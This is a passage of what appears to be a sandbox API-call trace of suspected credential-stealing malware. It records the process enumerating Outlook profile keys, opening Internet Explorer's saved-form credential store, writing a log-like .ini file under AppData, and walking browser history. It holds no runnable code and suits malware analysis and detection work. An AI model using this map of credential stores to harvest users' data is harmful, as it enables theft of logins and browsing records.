| out: KeyInformation=0x19df80, ResultLength=0x19e3c8) returned 0x0 [0243.614] NtCreateKey (in: KeyHandle=0x19e3d4, DesiredAccess=0x20219, ObjectAttributes=0x19d738*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c1b3326b5fa84f45970fa09da288db37", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19e3d4*=0x108) returned 0x0 [0243.614] NtEnumerateKey (in: KeyHandle=0x108, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x19db80, Length=0x400, ResultLength=0x19e3dc | out: KeyInformation=0x19db80, ResultLength=0x19e3dc) returned 0x8000001a [0243.614] NtClose (Handle=0x108) returned 0x0 [0243.614] NtEnumerateKey (in: KeyHandle=0x100, Index=0xd, KeyInformationClass=0x0, KeyInformation=0x19df80, Length=0x200, ResultLength=0x19e3c8 | out: KeyInformation=0x19df80, ResultLength=0x19e3c8) returned 0x0 [0243.614] NtCreateKey (in: KeyHandle=0x19e3d4, DesiredAccess=0x20219, ObjectAttributes=0x19d738*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19e3d4*=0x108) returned 0x0 [0243.615] NtEnumerateKey (in: KeyHandle=0x108, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x19db80, Length=0x400, ResultLength=0x19e3dc | out: KeyInformation=0x19db80, ResultLength=0x19e3dc) returned 0x8000001a [0243.615] NtClose (Handle=0x108) returned 0x0 [0243.615] NtEnumerateKey (in: KeyHandle=0x100, Index=0xe, KeyInformationClass=0x0, KeyInformation=0x19df80, Length=0x200, ResultLength=0x19e3c8 | out: KeyInformation=0x19df80, ResultLength=0x19e3c8) returned 0x8000001a [0243.615] NtCreateKey (in: KeyHandle=0x19ea30, DesiredAccess=0x20219, ObjectAttributes=0x19e3c0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook_2016\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea30*=0x108) returned 0x0 [0243.616] NtEnumerateKey (in: KeyHandle=0x108, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x19df80, Length=0x200, ResultLength=0x19e3c8 | out: KeyInformation=0x19df80, ResultLength=0x19e3c8) returned 0x8000001a [0243.617] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19db18 | out: TokenHandle=0x19db18*=0x104) returned 0x0 [0243.617] NtQueryInformationToken (in: TokenHandle=0x104, TokenInformationClass=0x1, TokenInformation=0x19d310, TokenInformationLength=0x400, ReturnLength=0x19db10 | out: TokenInformation=0x19d310, ReturnLength=0x19db10) returned 0x0 [0243.618] ConvertSidToStringSidW (in: Sid=0x19d318*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), StringSid=0x19db14 | out: StringSid=0x19db14*="S-1-5-21-4219442223-4223814209-3835049652-1000") returned 1 [0243.618] NtClose (Handle=0x104) returned 0x0 [0243.618] NtCreateKey (in: KeyHandle=0x19ea2c, DesiredAccess=0x20219, ObjectAttributes=0x19db14*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea2c*=0x104) returned 0x0 [0243.618] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x19da10, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.618] NtCreateFile (in: FileHandle=0x19da30, DesiredAccess=0x120089, ObjectAttributes=0x19d9f8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19da18, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19da30*=0x0, IoStatusBlock=0x19da18*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0243.619] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b070) returned 1 [0243.619] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x19da28, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.619] NtCreateFile (in: FileHandle=0x19da48, DesiredAccess=0x12019f, ObjectAttributes=0x19da10*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19da30, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19da48*=0x110, IoStatusBlock=0x19da30*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0243.620] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b070) returned 1 [0243.620] NtQueryInformationFile (in: FileHandle=0x110, IoStatusBlock=0x19da30, FileInformation=0x19d988, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19da30, FileInformation=0x19d988) returned 0x0 [0243.620] NtWriteFile (in: FileHandle=0x110, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19da30, Buffer=0x422670*, Length=0x28, ByteOffset=0x19d9a0*=0, Key=0x0 | out: IoStatusBlock=0x19da30, Buffer=0x422670*) returned 0x0 [0243.621] NtClose (Handle=0x110) returned 0x0 [0243.640] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1f4400) returned 0x3160020 [0243.680] CoInitialize (pvReserved=0x0) returned 0x0 [0243.713] CoCreateInstance (in: rclsid=0x19db24*(Data1=0x3c374a40, Data2=0xbae4, Data3=0x11cf, Data4=([0]=0xbf, [1]=0x7d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x69, [6]=0x46, [7]=0xee)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x19db34*(Data1=0xafa0dc11, Data2=0xc313, Data3=0x11d0, Data4=([0]=0x83, [1]=0x1a, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0xae, [7]=0x38)), ppv=0x19db4c | out: ppv=0x19db4c*=0x4368d8) returned 0x0 [0243.774] IUrlHistoryStg:EnumUrls (in: This=0x4368d8, ppenum=0x19db48 | out: ppenum=0x19db48*=0x436b20) returned 0x0 [0243.777] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x19f2e4 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.857] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.858] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.858] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.859] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.859] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.860] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.860] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.860] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.860] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.861] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.861] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.861] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.861] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.862] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.862] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.863] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.863] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.863] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.864] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.864] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.864] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.864] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.865] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.865] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.865] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.866] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.866] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.866] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.867] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.867] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.867] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.868] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.868] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.869] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.869] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.870] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.870] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.870] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.870] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.870] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.871] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.871] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.871] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.871] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.871] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.872] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.872] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.872] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.872] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.872] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.873] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.873] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.873] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.874] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.874] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.874] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.874] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.874] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.875] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.875] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.876] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.876] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.877] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.877] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.877] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.877] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.878] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.880] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.881] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.881] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.881] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.881] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.881] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.882] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.882] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.882] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.883] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.883] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.883] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.884] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.884] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.884] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.884] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.884] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.885] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.885] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.885] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.885] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.885] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.885] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.886] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.886] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.887] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.887] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.887] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.887] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.888] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.888] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.888] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.888] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.889] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, 